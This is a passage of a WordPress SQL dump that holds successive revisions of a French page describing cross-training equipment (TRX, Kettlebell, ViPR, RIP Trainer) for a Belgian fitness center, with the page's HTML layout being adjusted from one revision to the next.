charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:44:43', '2013-06-16 10:44:43', '', 22, 'http://www.crosstrainingcenter.be/?p=57', 0, 'revision', '', 0),
(58, 1, '2013-06-16 10:45:34', '2013-06-16 10:45:34', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n\r\n<table style=\"width: 100%\">\r\n<tr>\r\n<td style=\"width: 50%;padding:5px;\">1\r\n</td>\r\n<td style=\"width: 50%;padding:5px;\">2\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;padding:5px;\">3\r\n</td>\r\n<td style=\"width: 50%;padding:5px;\">4\r\n</td>\r\n</tr>\r\n</table>                 \r\n\r\n\r\n\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:45:34', '2013-06-16 10:45:34', '', 22, 'http://www.crosstrainingcenter.be/?p=58', 0, 'revision', '', 0),
(59, 1, '2013-06-16 10:46:19', '2013-06-16 10:46:19', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n\r\n<table style=\"width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">1\r\n</td>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">2\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">3\r\n</td>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">4\r\n</td>\r\n</tr>\r\n</table>                 \r\n\r\n\r\n\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:46:19', '2013-06-16 10:46:19', '', 22, 'http://www.crosstrainingcenter.be/?p=59', 0, 'revision', '', 0),
(63, 1, '2013-06-16 10:53:44', '2013-06-16 10:53:44', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\ntito<br>\r\ntoto<br>\r\nproute\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:53:44', '2013-06-16 10:53:44', '', 22, 'http://www.crosstrainingcenter.be/?p=63', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(60, 1, '2013-06-16 10:48:24', '2013-06-16 10:48:24', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">\r\n\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;width: 50%;padding:5px;\">Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>  \r\n</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">2</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">3</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:48:24', '2013-06-16 10:48:24', '', 22, 'http://www.crosstrainingcenter.be/?p=60', 0, 'revision', '', 0),
(61, 1, '2013-06-16 10:49:30', '2013-06-16 10:49:30', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">\r\n\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;width: 20%;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;width: 80%;padding:5px;\">Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>  \r\n</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">2</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">3</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:49:30', '2013-06-16 10:49:30', '', 22, 'http://www.crosstrainingcenter.be/?p=61', 0, 'revision', '', 0),
(62, 1, '2013-06-16 10:49:53', '2013-06-16 10:49:53', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">\r\n\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:1px;width: 20%;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:1px;width: 80%;padding:5px;\">Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>  \r\n</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">2</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">3</td>\r\n<td style=\"border: 0px; width: 50%; padding: 5px;\">4</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:49:53', '2013-06-16 10:49:53', '', 22, 'http://www.crosstrainingcenter.be/?p=62', 0, 'revision', '', 0),
(64, 1, '2013-06-16 10:55:17', '2013-06-16 10:55:17', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\ntito<br>\r\ntoto<br>\r\nproute\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:55:17', '2013-06-16 10:55:17', '', 22, 'http://www.crosstrainingcenter.be/?p=64', 0, 'revision', '', 0),
(65, 1, '2013-06-16 10:57:04', '2013-06-16 10:57:04', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\ntito<br>\r\ntoto<br>\r\nproute\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:57:04', '2013-06-16 10:57:04', '', 22, 'http://www.crosstrainingcenter.be/?p=65', 0, 'revision', '', 0),
(66, 1, '2013-06-16 10:59:52', '2013-06-16 10:59:52', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>TRX Suspension Training</h1>Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<h2>TRX Suspension Training</h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2>Kettlebel</h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2>ViPR</h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2>RIP Trainer</h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 10:59:52', '2013-06-16 10:59:52', '', 22, 'http://www.crosstrainingcenter.be/?p=66', 0, 'revision', '', 0),
(67, 1, '2013-06-16 11:03:08', '2013-06-16 11:03:08', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>TRX Suspension Training</h1>Conçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>Kettlebel</h1>Outil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n</td>\r\n</tr>\r\n</table>\r\n</div>\r\n&nbsp;\r\n\r\n<div class=\"arrondi\">\r\n<table style=\"border:1px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">imgimgimg\r\n</td>\r\n<td style=\"border:0px;padding:5px;\"><h1>ViPR</h1>Acronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La 